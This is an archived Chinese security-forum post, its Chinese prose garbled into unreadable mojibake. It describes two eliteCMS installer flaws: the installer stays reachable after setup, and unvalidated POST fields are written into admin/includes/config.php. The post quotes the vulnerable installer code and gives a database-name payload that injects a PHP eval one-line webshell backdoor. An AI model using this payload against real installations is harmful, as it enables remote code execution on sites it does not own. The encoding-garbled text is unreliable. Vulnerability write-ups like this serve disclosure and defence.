eliteCMS°²×°ÎÄ¼þÎ´ÑéÖ¤ + Ò»¾ä»°Ð´Èë°²È«Â©¶´

admin ·¢±íÓÚ 2012-11-18 13:59:27

eliteCMSµÄ°²×°³ÌÐò°²×°½áÊøºóÎ´×÷Ëø¶¨£¬µ¼ÖÂºÚ¿Í¿ÉÒÔÍ¨¹ý·ÃÎÊ°²×°³ÌÐòµØÖ·½øÐÐÖØ¸´°²×°

ÁíÍâÒ»¸öÂ©¶´ÊÇ°²×°³ÌÐò¿ÉÒÔÖ±½ÓÐ´ÈëÒ»¾ä»°µ½admin/includes/config.php
ÎÒÃÇÀ´¿´´úÂë£º

...
elseif ($_GET['step'] == "4") {
$file = "../admin/includes/config.php";
$write = "<?php\n";
$write .= "/**\n";
$write .= "*\n";
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...ÂÔ...
$write .= "*\n";
$write .= "*/\n";
$write .= "\n";
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
$write .= "if (!\$connection) {\n";
$write .= "    die(\"Database connection failed\" .mysql_error());\n";
$write .= "    \n";
$write .= "} \n";
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
$write .= "if (!\$db_select) {\n";
$write .= "    die(\"Database select failed\" .mysql_error());\n";
$write .= "    \n";
$write .= "} \n";
$write .= "?>\n";

$writer = fopen($file, 'w');
...

ÔÚ¿´´úÂë£º

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

È¡ÖµÎ´×÷ÈÎºÎÑéÖ¤
Èç¹û½«Êý¾Ý¿âÃûPOSTÊý¾Ý£º

"?><?php eval($_POST);?><?php

½«µ¼ÖÂÒ»¾ä»°ºóÃÅÐ´Èë/admin/includes/config.php

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

eliteCMS°²×°ÎÄ¼þÎ´ÑéÖ¤ + Ò»¾ä»°Ð´Èë°²È«Â©¶´